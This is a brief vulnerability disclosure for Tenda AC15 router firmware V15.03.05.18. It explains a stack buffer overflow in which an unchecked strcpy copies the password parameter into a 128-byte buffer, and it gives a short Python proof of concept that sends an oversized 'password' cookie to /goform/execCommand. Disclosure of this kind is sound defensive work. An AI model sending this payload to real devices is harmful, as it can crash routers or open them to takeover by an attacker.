- Firmware download website: https://www.tenda.com.cn/download/detail-2710.html
AC15 V15.03.05.18
The Tenda AC15 V15.03.05.18 firmware has a stack overflow vulnerability in the R7WebsSecurityHandler
function. The src
variable receives the password
parameter from a POST request and is later assigned to the v35
variable, which is fixed at 128 bytes. However, since the user can control the input of password
, the statement strcpy(v35, src);
can cause a buffer overflow. The user-provided password
can exceed the capacity of the v35
array, triggering this security vulnerability.
import requests
ip = "192.168.84.101"
url = "http://%s/goform/execCommand"%ip
cookie = {"Cookie":"password=" + "A"*1000}
ret = requests.get(url=url,cookies=cookie)
print(ret.text)